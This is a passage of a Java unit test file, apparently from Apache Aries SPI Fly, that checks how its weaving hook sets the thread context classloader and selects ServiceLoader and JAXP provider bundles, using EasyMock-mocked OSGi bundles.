Assert.assertTrue("Weaving should have added a dynamic import", di1.equals(di) || di2.equals(di));
// Invoke the woven class and check that it properly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl1 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals(Collections.singleton("olleh"), result);
}
@Test
public void testTCCLResetting() throws Exception {
ClassLoader cl = new URLClassLoader(new URL [] {});
Thread.currentThread().setContextClassLoader(cl);
Assert.assertSame("Precondition", cl, Thread.currentThread().getContextClassLoader());
Dictionary<String, String> consumerHeaders = new Hashtable<String, String>();
consumerHeaders.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
// Register the bundle that provides the SPI implementation.
Bundle providerBundle = mockProviderBundle("impl1", 1);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(consumerHeaders, providerBundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle("spifly", Version.parseVersion("1.9.4"), consumerBundle, providerBundle);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
Assert.assertNotNull("Precondition", clsUrl);
String clientClassName = "org.apache.aries.spifly.dynamic.TestClient";
WovenClass wc = new MyWovenClass(clsUrl, clientClassName, consumerBundle);
Assert.assertEquals("Precondition", 0, wc.getDynamicImports().size());
wh.weave(wc);
Assert.assertEquals(1, wc.getDynamicImports().size());
String di1 = "org.apache.aries.spifly;bundle-symbolic-name=spifly;bundle-version=1.9.4";
String di2 = "org.apache.aries.spifly;bundle-version=1.9.4;bundle-symbolic-name=spifly";
String di = wc.getDynamicImports().get(0);
Assert.assertTrue("Weaving should have added a dynamic import", di1.equals(di) || di2.equals(di));
// Invoke the woven class and check that it properly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl1 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
method.invoke(cls.newInstance(), "hi there");
Assert.assertSame(cl, Thread.currentThread().getContextClassLoader());
}
    @Test
    public void testTCCLResettingOnException() {
        // TODO implement: should verify that the woven code restores the thread
        // context classloader even when the invoked client method throws.
    }
@Test
public void testAltServiceLoaderLoadUnprocessed() throws Exception {
Bundle spiFlyBundle = mockSpiFlyBundle();
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
Bundle consumerBundle = mockConsumerBundle(headers, spiFlyBundle);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("UnaffectedTestClient.class");
Assert.assertNotNull("Precondition", clsUrl);
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.UnaffectedTestClient", consumerBundle);
Assert.assertEquals("Precondition", 0, wc.getDynamicImports().size());
wh.weave(wc);
Assert.assertEquals("The client is not affected so no additional imports should have been added",
0, wc.getDynamicImports().size());
// ok the weaving is done, now prepare the registry for the call
Bundle providerBundle = mockProviderBundle("impl1", 1);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle, new HashMap<String, Object>());
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl1 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals("impl4", result);
}
@Test
public void testMultipleProviders() throws Exception {
Bundle spiFlyBundle = mockSpiFlyBundle();
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
Bundle consumerBundle = mockConsumerBundle(headers, spiFlyBundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI files from impl1 and impl2 are visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "HELLO", "5"));
Assert.assertEquals("All three services should be invoked", expected, result);
}
@Test
public void testClientSpecifyingProvider() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "java.util.ServiceLoader#load(java.lang.Class);bundle=impl2");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("HELLO", "5"));
Assert.assertEquals("Only the services from bundle impl2 should be selected", expected, result);
}
@Test
public void testClientSpecifyingProviderVersion() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "java.util.ServiceLoader#load(java.lang.Class);bundle=impl2:version=1.2.3");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle3 = mockProviderBundle("impl2_123", 3, new Version(1, 2, 3));
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle3, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle3);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle3);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals("Only the services from bundle impl2 should be selected", Collections.singleton("Updated!hello!Updated"), result);
}
@Test
public void testClientMultipleTargetBundles() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"java.util.ServiceLoader#load(java.lang.Class);bundle=impl1|impl4");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle4);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "impl4"));
Assert.assertEquals("All providers should be selected for this one", expected, result);
}
@Test
public void testClientMultipleTargetBundles2() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"java.util.ServiceLoader#load(java.lang.Class);bundleId=1|4");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle4);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "impl4"));
Assert.assertEquals("All providers should be selected for this one", expected, result);
}
@Test
public void testClientSpecificProviderLoadArgument() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"java.util.ServiceLoader#load(java.lang.Class[org.apache.aries.mytest.MySPI])," +
"java.util.ServiceLoader#load(java.lang.Class[org.apache.aries.mytest.AltSPI]);bundle=impl4");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle4);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "impl4", "HELLO", "5"));
Assert.assertEquals("All providers should be selected for this one", expected, result);
// Weave the AltTestClient class.
URL cls2Url = getClass().getResource("AltTestClient.class");
WovenClass wc2 = new MyWovenClass(cls2Url, "org.apache.aries.spifly.dynamic.AltTestClient", consumerBundle);
wh.weave(wc2);
// Invoke the AltTestClient
Class<?> cls2 = wc2.getDefinedClass();
Method method2 = cls2.getMethod("test", new Class [] {long.class});
Object result2 = method2.invoke(cls2.newInstance(), 4096);
Assert.assertEquals("Only the services from bundle impl4 should be selected", -4096L, result2);
}
@Test
public void testClientSpecifyingDifferentMethodsLimitedToDifferentProviders() throws Exception {
Dictionary<String, String> headers1 = new Hashtable<String, String>();
headers1.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"javax.xml.parsers.DocumentBuilderFactory#newInstance();bundle=impl3," +
"java.util.ServiceLoader#load(java.lang.Class[org.apache.aries.mytest.MySPI]);bundle=impl4");
Dictionary<String, String> headers2 = new Hashtable<String, String>();
headers2.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"javax.xml.parsers.DocumentBuilderFactory#newInstance();bundle=system.bundle," +
"java.util.ServiceLoader#load;bundle=impl1");
Dictionary<String, String> headers3 = new Hashtable<String, String>();
headers3.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"org.acme.blah#someMethod();bundle=mybundle");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle3 = mockProviderBundle("impl3", 3);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle3, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle1 = mockConsumerBundle(headers1, providerBundle1, providerBundle2, providerBundle3, providerBundle4);
activator.addConsumerWeavingData(consumerBundle1, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle consumerBundle2 = mockConsumerBundle(headers2, providerBundle1, providerBundle2, providerBundle3, providerBundle4);
activator.addConsumerWeavingData(consumerBundle2, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle consumerBundle3 = mockConsumerBundle(headers3, providerBundle1, providerBundle2, providerBundle3, providerBundle4);
activator.addConsumerWeavingData(consumerBundle3, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle1, consumerBundle2, consumerBundle3,
providerBundle1, providerBundle2, providerBundle3, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
testConsumerBundleWeaving(consumerBundle1, wh, Collections.singleton("impl4"), "org.apache.aries.spifly.dynamic.impl3.MyAltDocumentBuilderFactory");
testConsumerBundleWeaving(consumerBundle2, wh, Collections.singleton("olleh"), thisJVMsDBF);
testConsumerBundleWeaving(consumerBundle3, wh, Collections.<String>emptySet(), thisJVMsDBF);
}
private void testConsumerBundleWeaving(Bundle consumerBundle, WeavingHook wh, Set<String> testClientResult, String jaxpClientResult) throws Exception {
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, TestClient.class.getName(), consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals(testClientResult, result);
URL clsUrl2 = getClass().getResource("JaxpClient.class");
WovenClass wc2 = new MyWovenClass(clsUrl2, JaxpClient.class.getName(), consumerBundle);
wh.weave(wc2);
Class<?> cls2 = wc2.getDefinedClass();
Method method2 = cls2.getMethod("test", new Class [] {});
Class<?> result2 = (Class<?>) method2.invoke(cls2.newInstance());
Assert.assertEquals(jaxpClientResult, result2.getName());
}
/**
 * With no provider bundles registered, a woven JAXP client must fall back to
 * the DocumentBuilderFactory implementation shipped with the running JRE.
 */
@Test
public void testJAXPClientWantsJREImplementation1() throws Exception {
    Bundle system = mockSystemBundle();

    Dictionary<String, String> consumerHeaders = new Hashtable<String, String>();
    consumerHeaders.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
            "javax.xml.parsers.DocumentBuilderFactory#newInstance()");

    Bundle client = mockConsumerBundle(consumerHeaders, system);
    activator.addConsumerWeavingData(client, SpiFlyConstants.SPI_CONSUMER_HEADER);

    BundleContext spiFlyContext = mockSpiFlyBundle(client, system).getBundleContext();
    WeavingHook hook = new ClientWeavingHook(spiFlyContext, activator);

    // Weave the JAXP client class and load the woven bytes.
    WovenClass woven = new MyWovenClass(
            getClass().getResource("JaxpClient.class"),
            "org.apache.aries.spifly.dynamic.JaxpClient", client);
    hook.weave(woven);
    Class<?> wovenClass = woven.getDefinedClass();

    // Invoke test() reflectively; it returns the factory class actually selected.
    Class<?> factoryClass = (Class<?>) wovenClass.getMethod("test").invoke(wovenClass.newInstance());
    Assert.assertEquals("JAXP implementation from JRE", thisJVMsDBF, factoryClass.getName());
}
// If there is an alternate implementation it should always be favoured over the JRE one
/**
 * Verifies that when a provider bundle (impl3) registers an alternative
 * DocumentBuilderFactory, the woven JAXP client uses it rather than the
 * implementation shipped with the JRE.
 */
@Test
public void testJAXPClientWantsAltImplementation1() throws Exception {
    Bundle systembundle = mockSystemBundle();

    // Register impl3 as an alternative DocumentBuilderFactory provider.
    Bundle providerBundle = mockProviderBundle("impl3", 1);
    activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle, new HashMap<String, Object>());

    Dictionary<String, String> headers = new Hashtable<String, String>();
    headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance()");
    Bundle consumerBundle = mockConsumerBundle(headers, providerBundle, systembundle);
    activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);

    WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, providerBundle, systembundle).getBundleContext(), activator);

    URL clsUrl = getClass().getResource("JaxpClient.class");
    WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
    wh.weave(wc);

    Class<?> cls = wc.getDefinedClass();
    Method method = cls.getMethod("test", new Class [] {});
    Class<?> result = (Class<?>) method.invoke(cls.newInstance());
    // Fixed assertion message: this test expects the *alternative* provider, not the JRE one
    // (the previous message "JAXP implementation from JRE" was copy-pasted from the JRE test).
    Assert.assertEquals("JAXP implementation from alternative bundle",
            "org.apache.aries.spifly.dynamic.impl3.MyAltDocumentBuilderFactory", result.getName());
}
/**
 * Even with an alternative provider (impl3) registered, a consumer that
 * explicitly pins the lookup to the system bundle via the {@code bundleId=0}
 * directive must still get the JRE's own DocumentBuilderFactory.
 */
@Test
public void testJAXPClientWantsJREImplementation2() throws Exception {
    Bundle systembundle = mockSystemBundle();

    // Register impl3 as an alternative DocumentBuilderFactory provider.
    Bundle providerBundle = mockProviderBundle("impl3", 1);
    activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle, new HashMap<String, Object>());

    // bundleId=0 selects the system bundle, i.e. the JRE-supplied implementation.
    Dictionary<String, String> headers = new Hashtable<String, String>();
    headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance();bundleId=0");
    Bundle consumerBundle = mockConsumerBundle(headers, providerBundle, systembundle);
    activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);

    WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, providerBundle, systembundle).getBundleContext(), activator);

    URL clsUrl = getClass().getResource("JaxpClient.class");
    WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
    wh.weave(wc);

    Class<?> cls = wc.getDefinedClass();
    Method method = cls.getMethod("test", new Class [] {});
    Class<?> result = (Class<?>) method.invoke(cls.newInstance());
    Assert.assertEquals("JAXP implementation from JRE", thisJVMsDBF, result.getName());
}
/**
 * A consumer that selects a provider by symbolic name via the
 * {@code bundle=impl3} directive must receive the DocumentBuilderFactory from
 * that bundle rather than the JRE's implementation.
 */
@Test
public void testJAXPClientWantsAltImplementation2() throws Exception {
    Bundle systembundle = mockSystemBundle();

    // Register impl3 as an alternative DocumentBuilderFactory provider.
    Bundle providerBundle = mockProviderBundle("impl3", 1);
    activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle, new HashMap<String, Object>());

    // bundle=impl3 selects the provider by symbolic name.
    Dictionary<String, String> headers = new Hashtable<String, String>();
    headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance();bundle=impl3");
    Bundle consumerBundle = mockConsumerBundle(headers, providerBundle, systembundle);
    activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);

    WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, providerBundle, systembundle).getBundleContext(), activator);

    URL clsUrl = getClass().getResource("JaxpClient.class");
    WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
    wh.weave(wc);

    Class<?> cls = wc.getDefinedClass();
    Method method = cls.getMethod("test", new Class [] {});
    Class<?> result = (Class<?>) method.invoke(cls.newInstance());
    Assert.assertEquals("JAXP implementation from alternative bundle", "org.apache.aries.spifly.dynamic.impl3.MyAltDocumentBuilderFactory", result.getName());
}
/**
 * Convenience overload: mocks the SpiFly bundle itself with the default
 * symbolic name {@code "spifly"} and version 1.0.0.
 *
 * @param bundles the other bundles visible in the mocked framework
 */
private Bundle mockSpiFlyBundle(Bundle ... bundles) throws Exception {
    return mockSpiFlyBundle("spifly", new Version(1, 0, 0), bundles);
}
/**
 * Mocks the SpiFly bundle and its BundleContext. The context reports all the
 * supplied bundles (plus the SpiFly bundle itself) from getBundles(), and is
 * also injected into the activator under test so it behaves as if started.
 *
 * @param bsn     symbolic name to report for the SpiFly bundle
 * @param version version to report for the SpiFly bundle
 * @param bundles additional bundles visible in the mocked framework
 * @return the mocked, replayed SpiFly bundle
 */
private Bundle mockSpiFlyBundle(String bsn, Version version, Bundle ... bundles) throws Exception {
    Bundle spiFlyBundle = EasyMock.createMock(Bundle.class);

    BundleContext spiFlyBundleContext = EasyMock.createMock(BundleContext.class);
    EasyMock.expect(spiFlyBundleContext.getBundle()).andReturn(spiFlyBundle).anyTimes();
    // The framework view: every supplied bundle plus the SpiFly bundle itself.
    List<Bundle> allBundles = new ArrayList<Bundle>(Arrays.asList(bundles));
    allBundles.add(spiFlyBundle);
    EasyMock.expect(spiFlyBundleContext.getBundles()).andReturn(allBundles.toArray(new Bundle [] {})).anyTimes();
    EasyMock.replay(spiFlyBundleContext);

    EasyMock.expect(spiFlyBundle.getSymbolicName()).andReturn(bsn).anyTimes();
    EasyMock.expect(spiFlyBundle.getVersion()).andReturn(version).anyTimes();
    // Long.MAX_VALUE keeps this id well clear of the real/mocked bundle ids used in tests.
    EasyMock.expect(spiFlyBundle.getBundleId()).andReturn(Long.MAX_VALUE).anyTimes();
    EasyMock.expect(spiFlyBundle.getBundleContext()).andReturn(spiFlyBundleContext).anyTimes();
    EasyMock.replay(spiFlyBundle);

    // Set the bundle context for testing purposes: inject it into the activator's
    // private field via reflection, mimicking BaseActivator.start().
    Field bcField = BaseActivator.class.getDeclaredField("bundleContext");
    bcField.setAccessible(true);
    bcField.set(activator, spiFlyBundle.getBundleContext());

    return spiFlyBundle;
}
/**
 * Convenience overload: mocks a provider bundle with an empty version.
 *
 * @param subdir test resource subdirectory holding the bundle's content
 * @param id     bundle id to report
 */
private Bundle mockProviderBundle(String subdir, long id) throws Exception {
    return mockProviderBundle(subdir, id, Version.emptyVersion);
}
/**
 * Mocks a provider bundle backed by the resources found in the given test
 * subdirectory. The subdirectory must contain a META-INF/services tree; each
 * service file found there is parsed for the provider class names it declares.
 *
 * @param subdir  test resource subdirectory; also used to derive the symbolic
 *                name (everything before the first '_' character)
 * @param id      the bundle id to report
 * @param version the bundle version to report
 * @return a mocked Bundle exposing the discovered entries and classes
 */
private Bundle mockProviderBundle(String subdir, long id, Version version) throws Exception {
    // Locate this test class on disk so the per-test resource subdirectories
    // next to it can be found.
    URL url = getClass().getResource("/" + getClass().getName().replace('.', '/') + ".class");
    File classFile = new File(url.getFile());
    File baseDir = new File(classFile.getParentFile(), subdir);
    File directory = new File(baseDir, "/META-INF/services");

    final List<String> classNames = new ArrayList<String>();

    // Do a directory listing of the applicable META-INF/services directory.
    List<String> resources = new ArrayList<String>();
    for (File f : directory.listFiles()) {
        String fileName = f.getName();
        // Skip hidden files and editor/backup artifacts.
        if (fileName.startsWith(".") || fileName.endsWith("."))
            continue;

        classNames.addAll(getClassNames(f));

        // Needs to be something like: META-INF/services/org.apache.aries.mytest.MySPI
        String path = f.getAbsolutePath().substring(baseDir.getAbsolutePath().length());
        path = path.replace('\\', '/');
        if (path.startsWith("/")) {
            path = path.substring(1);
        }
        resources.add(path);
    }

    // Set up the classloader that will be used by the ASM-generated code as the TCCL.
    // It can load a META-INF/services file.
    final ClassLoader cl = new TestProviderBundleClassLoader(subdir, resources.toArray(new String [] {}));

    final List<String> classResources = new ArrayList<String>();
    for (String className : classNames) {
        classResources.add("/" + className.replace('.', '/') + ".class");
    }

    BundleContext bc = EasyMock.createNiceMock(BundleContext.class);
    EasyMock.replay(bc);

    Bundle providerBundle = EasyMock.createMock(Bundle.class);
    String bsn = subdir;
    int idx = bsn.indexOf('_');
    if (idx > 0) {
        bsn = bsn.substring(0, idx);
    }
    EasyMock.expect(providerBundle.getSymbolicName()).andReturn(bsn).anyTimes();
    EasyMock.expect(providerBundle.getBundleId()).andReturn(id).anyTimes();
    EasyMock.expect(providerBundle.getBundleContext()).andReturn(bc).anyTimes();
    EasyMock.expect(providerBundle.getVersion()).andReturn(version).anyTimes();
    EasyMock.expect(providerBundle.getEntryPaths("/")).andAnswer(new IAnswer<Enumeration<String>>() {
        @Override
        public Enumeration<String> answer() throws Throwable {
            return Collections.enumeration(classResources);
        }
    }).anyTimes();
    EasyMock.<Class<?>>expect(providerBundle.loadClass(EasyMock.anyObject(String.class))).andAnswer(new IAnswer<Class<?>>() {
        @Override
        public Class<?> answer() throws Throwable {
            String name = (String) EasyMock.getCurrentArguments()[0];
            if (!classNames.contains(name)) {
                // Bug fix: Bundle.loadClass() is specified to throw
                // ClassNotFoundException for unknown classes; the previous code
                // threw ClassCastException, which callers do not expect.
                throw new ClassNotFoundException(name);
            }
            return cl.loadClass(name);
        }
    }).anyTimes();
    EasyMock.replay(providerBundle);
    return providerBundle;
}
/**
 * Parses a META-INF/services provider-configuration file and returns the
 * provider class names it declares.
 * <p>
 * Per the {@code java.util.ServiceLoader} file format, text following a '#'
 * on a line is a comment and blank lines are ignored. Previously such lines
 * were returned as bogus empty/comment "class names".
 *
 * @param f the service file to parse
 * @return the declared class names, in file order
 * @throws IOException if the file cannot be read
 */
private Collection<String> getClassNames(File f) throws IOException {
    List<String> names = new ArrayList<String>();

    BufferedReader br = new BufferedReader(new FileReader(f));
    try {
        String line = null;
        while ((line = br.readLine()) != null) {
